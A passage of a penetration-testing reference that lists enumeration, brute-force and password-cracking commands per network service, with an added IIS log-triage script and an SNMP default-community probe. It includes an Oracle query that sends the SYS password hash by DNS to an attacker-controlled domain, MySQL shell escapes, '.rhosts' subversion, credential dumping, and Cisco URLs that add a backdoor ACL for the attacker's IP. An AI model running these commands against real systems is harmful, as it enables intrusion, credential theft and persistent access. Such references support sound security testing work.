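RISKY_METHODS = ("PUT", "DELETE", "PROPFIND", "TRACE", "OPTIONS")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header may be repeated when IIS rolls the log
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            # IIS replaces spaces inside values with '+', so a plain split is safe.
            yield dict(zip(fields, line.split(" ")))


def summarise(text):
    """(client, status) counts, (client, method) counts and User-Agent counts."""
    by_client_status, methods, agents = Counter(), Counter(), Counter()
    for rec in parse_w3c(text):
        by_client_status[(rec["c-ip"], rec["sc-status"])] += 1
        methods[(rec["c-ip"], rec["cs-method"])] += 1
        agents[rec.get("cs(User-Agent)", "-")] += 1
    return by_client_status, methods, agents


def suspicious_clients(text, risky=RISKY_METHODS, error_threshold=2):
    """Clients that used WebDAV/diagnostic methods or produced >= error_threshold 4xx responses."""
    by_client_status, methods, _ = summarise(text)
    flagged = {ip for (ip, m) in methods if m in risky}
    errors = Counter()
    for (ip, status), n in by_client_status.items():
        if status.startswith("4"):
            errors[ip] += n
    flagged |= {ip for ip, n in errors.items() if n >= error_threshold}
    return sorted(flagged)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    by_cs, _, agents = summarise(text)
    for (ip, status), n in sorted(by_cs.items()):
        print(f"{n:6d} {ip} {status}")
    print("user agents:", dict(agents))
    print("suspicious:", suspicious_clients(text))
```

Run it as `python iislog.py c:\winnt\system32\Logfiles\W3SVC1\ex090302.log` (filename is a placeholder); without an argument it summarises the embedded sample. The method list and the error threshold are deliberately parameters, since what counts as noisy differs between an internet-facing site and an intranet OWA front end.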

References, White Papers, Cross Site Request Forgery: An Introduction to a Common Web Application Weakness, Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity, Blind Security Testing - An Evolutionary Approach, Command Injection in XML Signatures and Encryption, Input Validation Cheat Sheet, SQL Injection Cheat Sheet, Books, Hacking Exposed Web 2.0, Hacking Exposed Web Applications, The Web Application Hacker's Handbook

Exploit Frameworks, Brute-force Tools, Acunetix, Metasploit, w3af

Portmapper port 111 open
Target notation used by some tools: username:password@IP_Address port/protocol (e.g. 80/HTTP)

rpcinfo, rpcinfo [options] IP_Address

NTP Port 123 open

NTP Enumeration, ntpdc -c monlist IP_ADDRESS, ntpdc -c sysinfo IP_ADDRESS, ntpq, host, hostname, ntpversion, readlist, version

Examine configuration files, ntp.conf

nmap nse script, ntp-info

NetBIOS Ports 135-139,445 open

NetBIOS enumeration: Enum - enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>; Null Session - net use \\ip_address\ipc$ "" /u:"" then net view \\ip_address; Dumpsec; Smbclient - smbclient -L //server -N (null session) or smbclient -L //server/share password options; Superscan (Enumeration tab); user2sid/sid2user; Winfo

NetBIOS brute force, Hydra, Brutus, Cain & Abel, getacct, NAT (NetBIOS Auditing Tool)

Examine Configuration Files, Smb.conf, lmhosts

SNMP port 161 open

Default Community Strings, public, private, cisco, cable-docsis, ILMI

MIB enumeration. Windows NT MIB branches: hostnames, domain name, usernames, running services, share information. Tools: Solarwinds MIB walk; Getif; snmpwalk -v <Version> -c <Community string> <IP>; Snscan. Applications: ZyXEL - snmpget -v2c -c <Community String> <IP>; snmpwalk -v2c -c <Community String> <IP>. nmap nse script: snmp-sysdescr

SNMP Bruteforce: onesixtyone - onesixtyone -c SNMP.wordlist <IP>; cat - ./cat -h <IP> -w SNMP.wordlist; Solarwinds SNMP Brute Force; ADMsnmp; nmap nse script: snmp-brute

Examine SNMP Configuration files, snmp.conf, snmpd.conf, snmp-config.xml
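What onesixtyone and `snmpwalk -c public` do on the wire for the default-community check is a single SNMPv1/v2c GetRequest for sysDescr.0 and a look at whether a GetResponse comes back. The following is an added example, not part of the Penetration Testing Framework: it BER-encodes that request by hand and decodes the response with a small TLV reader, so the five default community strings from the node can be confirmed without net-snmp installed. The response bytes in the test are constructed; the target host is a placeholder.

```python
"""SNMPv1/v2c community-string probe: GetRequest sysDescr.0, decode GetResponse.

Added example, not code from the original framework. Pure standard
library; the BER subset implemented is exactly what SNMP v1/v2c messages use.
"""
import random
import socket

SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
DEFAULT_COMMUNITIES = ("public", "private", "cisco", "cable-docsis", "ILMI")


def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, value):
    return bytes([tag]) + ber_len(len(value)) + value


def ber_int(v):
    """Two's-complement INTEGER with the minimal byte count (0x00 lead byte when the top bit is set)."""
    return tlv(INTEGER, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def ber_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]              # first two arcs share one byte
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        while a > 0x7F:                         # base-128, high bit = continuation
            a >>= 7
            chunk.insert(0, 0x80 | (a & 0x7F))
        out += chunk
    return tlv(OID, bytes(out))


def build_get(community, oid=SYS_DESCR_0, version=1, request_id=None):
    """version 0 = SNMPv1, 1 = SNMPv2c (what 'snmpwalk -v2c' sends)."""
    if request_id is None:
        request_id = random.randrange(1, 2**31)
    varbind = tlv(SEQUENCE, ber_oid(oid) + tlv(NULL, b""))
    pdu = tlv(GET_REQUEST, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(SEQUENCE, varbind))
    return tlv(SEQUENCE, ber_int(version) + tlv(OCTET_STRING, community.encode()) + pdu)


def read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV at buf[pos]; handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_response(pkt):
    """(community, sysDescr) from a noError GetResponse, else None."""
    tag, msg, _ = read_tlv(pkt)
    if tag != SEQUENCE:
        return None
    _, _, pos = read_tlv(msg)                         # version
    _, community, pos = read_tlv(msg, pos)
    tag, pdu, _ = read_tlv(msg, pos)
    if tag != GET_RESPONSE:
        return None
    _, _, pos = read_tlv(pdu)                         # request-id
    _, err, pos = read_tlv(pdu, pos)                  # error-status, 0 = noError
    if err != b"\x00":
        return None
    _, _, pos = read_tlv(pdu, pos)                    # error-index
    _, varbinds, _ = read_tlv(pdu, pos)
    _, varbind, _ = read_tlv(varbinds)
    _, _, pos = read_tlv(varbind)                     # the OID we asked for
    tag, value, _ = read_tlv(varbind, pos)
    if tag != OCTET_STRING:
        return None
    return community.decode(errors="replace"), value.decode(errors="replace")


def probe(host, communities=DEFAULT_COMMUNITIES, port=161, timeout=2.0):
    """Try each community against host (placeholder); return {community: sysDescr} for replies."""
    hits = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for c in communities:
            s.sendto(build_get(c), (host, port))
            try:
                parsed = parse_response(s.recv(4096))
            except (socket.timeout, IndexError):
                continue                              # silence is how a wrong community is refused
            if parsed:
                hits[c] = parsed[1]
    return hits
```

A wrong community string is simply not answered (unless authentication traps are on), so absence of a reply is the negative result and the timeout is the cost per guess; a hit on `private` rather than `public` matters more, since it is normally the read-write string and opens the config-download tricks listed under the ZyXEL and Cisco nodes.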

LDAP Port 389 Open

ldap enumeration, ldapminer, ldapminer -h ip_address -p port (not required if default) -d, luma, Gui based tool, ldp, Gui based tool, openldap, ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...], ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file], ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn], ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file], ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

ldap brute force, bf_ldap, bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,), K0ldS,

Examine Configuration Files. General: containers.ldif, ldap.cfg, ldap.conf, ldap.xml, ldap-config.xml, ldap-realm.xml, slapd.conf. IBM SecureWay V3 server. Microsoft Active Directory server: msadClassesAttrs.ldif. Netscape Directory Server 4: nsslapd.sas_at.conf, nsslapd.sas_oc.conf. OpenLDAP directory server: slapd.sas_at.conf, slapd.sas_oc.conf. Sun ONE Directory Server 5.1: 75sas.ldif

PPTP/L2TP/VPN port 500/1723 open

Enumeration, ike-scan, ike-probe

Brute-Force, ike-crack

Reference Material, PSK cracking paper, SecurityFocus Infocus, Scanning a VPN Implementation

Modbus port 502 open


rlogin port 513 open

Rlogin Enumeration, Find the files, find / -name .rhosts, locate .rhosts, Examine Files, cat .rhosts, Manual Login, rlogin hostname -l username, rlogin <IP>, Subvert the files, echo ++ > .rhosts

Rlogin Brute force, Hydra

rsh port 514 open

Rsh Enumeration, rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

Rsh Brute Force, rsh-grind, Hydra, medusa

SQL Server Port 1433 1434 open

SQL Enumeration, piggy, SQLPing, sqlping ip_address/hostname, SQLPing2, SQLPing3, SQLpoke, SQL Recon, SQLver

SQL Brute Force, SQLPAT, sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack, sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack, SQL Dict, SQLAT, Hydra, SQLlhf, ForceSQL

Citrix port 1494 open

Citrix Enumeration, Default Domain, Published Applications, ./citrix-pa-scan {IP_address/file | - | random} [timeout], IP_to_proxy_to [Local_IP]

Citrix Brute Force, bforce.js, connect.js, Citrix Brute-forcer, Reference Material, Hacking Citrix - the legitimate backdoor, Hacking Citrix - the forceful way

Oracle Port 1521 Open

Oracle Enumeration: oracsec; Repscan; Sidguess; Scuba. DNS/HTTP enumeration (exfiltrate data via a DNS lookup to a name server you control): SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.attacker_domain') FROM DUAL; (the SYS password hash arrives as the hostname being resolved). WinSID; Oracle default password list; TNSVer - tnsver host [port]; TCP scan. Oracle TNSLSNR will respond to: ping, version, status, service, change_password, help, reload, save_config, set log_directory, set display_mode, set log_file, show, spawn, stop. TNSCmd (perl script): -h ip_address; version -h ip_address; status -h ip_address; -h ip_address --cmdsize (40 - 200). LSNrCheck. Oracle Security Check (needs credentials). OAT: sh -s ip_address; opwg.bat -s ip_address; sh -s ip_address -u username -p password -d SID or c:\oquery -s ip_address -u username -p password -d SID. OScanner: sh -s ip_address; oscanner.exe -s ip_address; sh oscanner_saved_file.xml; reportviewer.exe oscanner_saved_file.xml. NGS Squirrel for Oracle. Service Register: Service-register.exe ip_address. PLSQL Scanner 2008

Oracle Brute Force. OAK: ora-getsid hostname port sid_dictionary_list; ora-auth-alter-session host port sid username password sql; ora-brutesid host port start; ora-pwdbrute host port sid username password-file; ora-userenum host port sid userlistfile; ora-ver -e (-f -l -a) host port. breakable (targets the application server port): breakable.exe host url [port] [v], where host = IP address of the Oracle Portal Server, url = PATH_INFO i.e. /pls/orasso, port = TCP port the Oracle Portal Server is serving pages from, v = verbose. SQLInjector (targets the application server port): sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL; sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle. Check password: orabf - orabf [hash]:[username] [options]; thc-orakel (cracker, client, crypto). DBVisualisor; SQL scripts; manual SQL input of previously reported vulnerabilities

Oracle Reference Material: Understanding SQL Injection, SQL Injection walkthrough, SQL Injection by example, Advanced SQL Injection in Oracle databases, Blind SQL Injection, SQL cheatsheets

NFS Port 2049 open

NFS Enumeration, showmount -e hostname/ip_address, mount -t nfs ip_address:/directory_found_exported /local_mount_point

NFS Brute Force, Interact with NFS share and try to add/delete, Exploit and Confuse Unix

Examine Configuration Files, /etc/exports, /etc/lib/nfs/xtab

nmap nse script, nfs-showmount

Compaq/HP Insight Manager ports 2301, 2381 open

HP Enumeration, Authentication Method, Host OS Authentication, Default Authentication, Default Passwords, Wikto, Nstealth

HP Bruteforce, Hydra, Acunetix

Examine Configuration Files: mx.log, CLIClientConfig.cfg, database.props, pg_hba.conf, jboss-service.xml, .namazurc

MySQL port 3306 open

Enumeration, nmap -A -n -p3306 <IP Address>, nmap -A -n -PN --script:ALL -p3306 <IP Address>, telnet IP_Address 3306, use test; select * from test;, To check for other DB's -- show databases

Administration, MySQL Network Scanner, MySQL GUI Tools, mysqlshow, mysqlbinlog

Manual Checks
Default usernames and passwords: username root with a blank password. Testing: mysql -h <Hostname> -u root; mysql -h <Hostname> -u root@localhost; mysql -h <Hostname>; mysql -h <Hostname> -u ""@localhost
Configuration files. Windows: config.ini, my.ini, windows\my.ini, winnt\my.ini, <InstDir>/mysql/data/. Unix: my.cnf, /etc/my.cnf, /etc/mysql/my.cnf, /var/lib/mysql/my.cnf, ~/.my.cnf
Command history: ~/.mysql.history
Log files: connections.log, update.log, common.log
To run many SQL commands at once: mysql -u username -p < manycommands.sql
MySQL data directory (location specified in my.cnf): parent dir = data directory; databases mysql, test, information_schema (key information in MySQL). Complete table list: select table_schema,table_name from tables; Exact privileges: select grantee, table_schema, privilege_type FROM schema_privileges; File privileges: select user,file_priv from mysql.user where user='root'; Version: select version(); Load a specific file: SELECT LOAD_FILE('FILENAME');
SSL check: mysql> show variables like 'have_openssl'; If no rows are returned at all, the build itself does not support SSL connections and probably needs to be recompiled; if the value is DISABLED, the server was simply not started with SSL, which is easily fixed.
Privilege escalation. Current level of access: mysql> select user(); mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()'; Access passwords: mysql> use mysql; mysql> select user,password from user; Create a new user and grant privileges: mysql> create user test identified by 'test'; mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION; Break into a shell: mysql> \! cat /etc/passwd; mysql> \! bash

SQL injection, http://target/ expected_string database

References, Design Weaknesses, MySQL running as root, Exposed publicly on the Internet

RDesktop port 3389 open

Rdesktop Enumeration, Remote Desktop Connection

Rdesktop Bruteforce, TSGrinder, tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address, Tscrack

Sybase Port 5000+ open

Sybase Enumeration, sybase-version ip_address from NGS

Sybase Vulnerability Assessment, Use DBVisualiser, Sybase Security checksheet, Copy output into Excel spreadsheet, Evaluate mis-configured parameters, Manual SQL input of previously reported vulnerabilities, Advanced SQL Injection in SQL Server, More Advanced SQL Injection, NGS Squirrel for Sybase

SIP Port 5060 open

SIP Enumeration, netcat, nc IP_Address Port, sipflanker, python 192.168.1-254, Sipscan, smap, smap IP_Address/Subnet_Mask, smap -o IP_Address/Subnet_Mask, smap -l IP_Address

SIP Packet Crafting etc., sipsak, Tracing paths:- sipsak -T -s sip:username@domain, Options request:- sipsak -vv -s sip:username@domain, Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain, siprogue

SIP Vulnerability Scanning/ Brute Force, tftp bruteforcer, Default dictionary file, ./ IP_Address Dictionary_file Maximum_Processes, VoIPaudit, SiVuS

Examine Configuration Files, SIPDefault.cnf, asterisk.conf, sip.conf, phone.conf, sip_notify.conf, <Ethernet address>.cfg, 000000000000.cfg, phone1.cfg, sip.cfg etc. etc.

VNC port 5900^ open

VNC Enumeration, Scans, 5900^ for direct access. 5800 for HTTP access.

VNC Brute Force, Password Attacks, Remote, Password Guess, vncrack, Password Crack, vncrack, Packet Capture, Phoss, Local, Registry Locations, \HKEY_CURRENT_USER\Software\ORL\WinVNC3, \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3, Decryption Key, 0x238210763578887

Examine Configuration Files, .vnc, /etc/vnc/config, $HOME/.vnc/config, /etc/sysconfig/vncservers, /etc/vnc.conf

Tor Port 9001, 9030 open

Tor Node Checker, IP Pages

nmap NSE script

JetDirect 9100 open


Password cracking

Rainbow crack


rainbow tables, rcrack c:\rainbowcrack\*.rt -f pwfile.txt


Cain & Abel

John the Ripper

./unshadow passwd shadow > file_to_crack

./john -single file_to_crack

./john -w=location_of_dictionary_file -rules file_to_crack

./john -show file_to_crack

./john --incremental:All file_to_crack


fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} e.g. fgdump.exe -u hacker -p hard_password -c -f target.txt




L0phtcrack (Note: This tool was acquired by Symantec from @stake and it is their policy not to ship outside the USA and Canada)

Domain credentials


pwdump import

sam import

aiocracker [md5, sha1, sha256, sha384, sha512] hash dictionary_list

Vulnerability Assessment - Using vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of the tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared with any Common Vulnerabilities and Exploits (CVE) that have been released and the result is reported to the user. Other tools actually use manual pen testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.


Patch Levels

Confirmed Vulnerabilities, Severe, High, Medium, Low



Vulnerabilities, Severe, High, Medium, Low



Nessus (Linux), Nessus (Windows)

NGS Typhon

NGS Squirrel for Oracle

NGS Squirrel for SQL





Oval Interpreter


Security Manager +



Security Focus

Microsoft Security Bulletin

Common Vulnerabilities and Exploits (CVE)

National Vulnerability Database (NVD)

The Open Source Vulnerability Database (OSVDB), Standalone Database, Update URL

United States Computer Emergency Response Team (US-CERT)

Computer Emergency Response Team

Mozilla Security Information



PacketStorm Security

Security Tracker



Wireless Vulnerabilities and Exploits (WVE)



F-Secure Blog

g0ne blog


ha.ckers Blog

Jeremiah Grossman Blog


nCircle Blogs


Rational Security

Rise Security

Security Fix Blog

Software Vulnerability Exploitation Blog

Taosecurity Blog

AS/400 Auditing


Information Gathering, Nmap using common iSeries (AS/400) services., Unsecured services (Port;name;description), Secured services (Port;name;description), NetCat (old school technique), nc -v -z -w target ListOfServices.txt | grep "open", Banner Grabbing, Telnet, Using TN5250, Tools, Mochasoft (trial), SDI (Trial), Debian package, IBM Client Access iSeries (install for Debian), Good How-To (in French)., Security-Database transcription in English, Download the Package from location, Convert RPM to DEB package, aptitude install alien, alien iSeriesAccess-XX.rpm, Installing Deb Package, dpkg -i iSeriesAccess-xxx.deb, Running binary file, /opt/ibm/iSeriesAccess/bin/ibm5250, Sometimes this error occurs : error while loading, This means OpenMotif is missing, Add deb sid main non-free to /etc/apt/sources.list, aptitude update, aptitude install libmotif3, Remove added line from /etc/apt/sources.list and launch aptitude update, After installing OpenMotif, this error sometimes occurs : error while loading, This means the lib path to iSeriesAccess could not be reached, You should add iseriesaccess (/opt/ibm/iSeriesAccess/lib) to /etc/, run the command : ldconfig, Old School hack : LD_LIBRARY_PATH=/opt/ibm/iSeriesAccess/lib/:${LD_LIBRARY_PATH} /opt/ibm/iSeriesAccess/bin/ibm5250, Something else, Search for binary using dpkg -L iseriesaccess, FTP, echo quit | nc -v target 21, HTTP Banner, echo GET / | nc -v target 80, Browser HTTP administrative (if available), http://target:2001, http://target:2010, POP3, echo quit | nc target 110, Basic POP3 retriever, GetMail, SNMP, Snmpwalk, GFI Languard, SMTP, SMTPScan

User Enumeration, Default AS/400 user accounts, Error messages, Telnet Login errors, POP3 authentication Errors, CPF2204: User profile XXXX not found, CPF22E2: Password not correct for User profile XXXX, CPF22E3: User profile XXXX is disabled, CPF22E4: Password for User profile XXXX has expired, CPF22E5: No Password associated with User profile XXXX, Qsys symbolic link (if ftp is enabled), ftp target | quote stat | quote site namefmt 1, cd /, quote site listfmt 1, mkdir temp, quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys'), quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys'), dir /temp/qsys/*.usrprf, Here you should see some profiles listed, LDAP, Need os400-sys value from ibm-slapdSuffix, Consider grabbing it using FTP from QIBM/UserData/OS400/DirSrv/, slapd.conf, ibmslapd.conf, Resolve IP address., Telnet Value screen., Tool to browse LDAP, LdapBrowser, LDAP Utility, Luma LDAP browser and more, LdapSearch (unix utility), Enumeration

Exploitation, CVE References, CVE-2005-1244 - Severity : High - CVSS : 7.0, CVE-2005-1243 - Severity : Low - CVSS : 3.3, CVE-2005-1242 - Severity : Low - CVSS : 3.3, CVE-2005-1241 - Severity : High - CVSS : 7.0, CVE-2005-1240 - Severity : High - CVSS : 7.0, CVE-2005-1239 - Severity : Low - CVSS : 3.3, CVE-2005-1238 - Severity : High - CVSS : 9.0, CVE-2005-1182 - Severity : Low - CVSS : 3.3, CVE-2005-1133 - Severity : Low - CVSS : 3.3, CVE-2005-1025 - Severity : Low - CVSS : 3.3, CVE-2005-0868 - Severity : High - CVSS : 7.0, CVE-2005-0899 - Severity : Low - CVSS : 2.3, CVE-2002-1822 - Severity : Low - CVSS : 3.3, CVE-2002-1731 - Severity : Low - CVSS : 2.3, CVE-2000-1038 - Severity : Low - CVSS : 3.3, CVE-1999-1279 - Severity : Low - CVSS : 3.3, CVE-1999-1012 - Severity : Low - CVSS : 3.3, Access with Work Station Gateway, http://target:5061/WSG, Default AS/400 accounts., Network attacks (next release), DB2, QSHELL, Hijacking Terminals, Trojan attacks, Hacking from AS/400


System Value Security, Recommended value is 30

Password Policy

Audit level, Recommended value is *SECURITY

Documentation, User class, System Audit Settings, Special Authorities Definitions

Bluetooth Specific Testing

bluebugger [OPTIONS] -a <addr> [MODE]

Exploit Frameworks

BlueMaho


URLs, Bluejackers, bluetooth-pentest, Trifinite

Vulnerability Information, Common Vulnerabilities and Exploits (CVE), Vulnerabilities and exploit information relating to these products can be found here:

White Papers, Bluesnarfing

Cisco Specific Testing


Scan & Fingerprint, If SNMP is active, then community string guessing should be performed.

Credentials Guessing, Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

Connect, If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

Check for bugs, The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact., There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

Further your attack, running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network., startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network., #> access-list 100 permit ip <IP> any

Scan & Fingerprint.

Port Scanning, nmap, Other tools, Usage: ./ciscos <IP> <class> [option], mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

Fingerprinting, BT cisco-torch-0.4b # -A, TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

Password Guessing.

./CAT -h <IP> -a password.wordlist

./enabler <IP> [-u username] -p password /password.wordlist [port]

BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

SNMP Attacks.

./CAT -h <IP> -w SNMP.wordlist

onesixtyone -c SNMP.wordlist <IP>, BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

snmpwalk -v <Version> -c <Community string> <IP>


Telnet, telnet <IP>, Sample Banners


Web Browser, This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:, Authentication Required Enter username and password for "level_15_access" at User Name: Password:, Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter., Cisco Systems Accessing Cisco 2610 "router", Show diagnostic log - display the diagnostic log., Monitor the router - HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, VPN Device Manager (VDM) - Configure and monitor Virtual Private Networks (VPNs) through the web interface.

TFTP, ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names., ./ <options> <IP,hostname,network>, ./ <options> -F <hostlist>, Creating backdoors in Cisco IOS using TCL, telnet <router IP>:Port, tclshell

Known Bugs.

Attack Tools, [13] - 0 Encoding IDS Bypass Vulnerability (UTF), [14] - Cisco IOS HTTP Denial of Service Vulnerability, Web browse to the Cisco device: http://<IP>, http://<IP>/level/99/configure/logging/trap/emergencies/CR, http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR, ./ios-w3-vul fetch > /tmp/router.txt

Common Vulnerabilities and Exploits (CVE) Information, Vulnerabilities and exploit information relating to these products can be found here:

Configuration Files.

Configuration files explained, The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access., Password Encryption Utilised, Boson GetPass, Cain, Online cracking, Cain, John the Ripper, Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA., Configuration Testing Tools, Nipper, fwauto (Beta)


Cisco IOS Exploitation Techniques

Citrix Specific Testing

Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/penetration test against Citrix.


web search, Google (GHDB), ext:ica, inurl:citrix/metaframexp/default/login.asp, [WFClient] Password= filetype:ica, inurl:citrix/metaframexp/default/login.asp? ClientDetection=On, inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login", inurl:/Citrix/Nfuse17/, inurl:Citrix/MetaFrame/default/default.aspx, Google Hacks (Author Discovered), filetype:ica Username=, inurl:/Citrix/AccessPlatform/, inurl:LogonAgent/Login.asp, inurl:/CITRIX/NFUSE/default/login.asp, inurl:/Citrix/NFuse161/login.asp, inurl:/Citrix/NFuse16, inurl:/Citrix/NFuse151/, allintitle:MetaFrame XP Login, allintitle:MetaFrame Presentation Server Login, inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On, allintitle:Citrix(R) NFuse(TM) Classic Login, allintitle:Citrix(R) NFuse(TM), allintitle:Citrix(r) NFuse(tm) 1.6, allintitle:Citrix(R) NFuse(TM) Options, allintitle:Citrix(R) NFuse(TM) Innlogging, Yahoo, originurlextension:ica

site search, Manual, review web page for useful information, review source for web page

generic, nmap -A -PN -p 80,443,1494 ip_address, amap -bqv ip_address port_no.

citrix specific, perl ip_address, enum.js, enum.js apps TCPBrowserAddress=ip_address, connect.js, connect.js TCPBrowserAddress=ip_address Application=advertised-application, Citrix-pa-scan, perl ip_address [timeout] > pas.wri, pabrute.c, ./pabrute pubapp list app_list ip_address

Default Ports, TCP, Citrix XML Service, 80, Advanced Management Console, 135, Citrix SSL Relay, 443, ICA sessions, 1494, Server to server, 2512, Management Console to server, 2513, Session Reliability (Auto-reconnect), 2598, Note: - If 1494 is open, this would not normally be seen, License Management Console, 8082, License server, 27000, UDP, Clients to ICA browser service, 1604, Server-to-server, 1604

nmap nse scripts, citrix-enum-apps, nmap -sU --script=citrix-enum-apps -p 1604 <host>, citrix-enum-apps-xml, nmap --script=citrix-enum-apps-xml -p 80,443 <host>, citrix-enum-servers, nmap -sU --script=citrix-enum-servers -p 1604 <host>, citrix-enum-servers-xml, nmap --script=citrix-enum-servers-xml -p 80,443 <host>, citrix-brute-xml, nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>


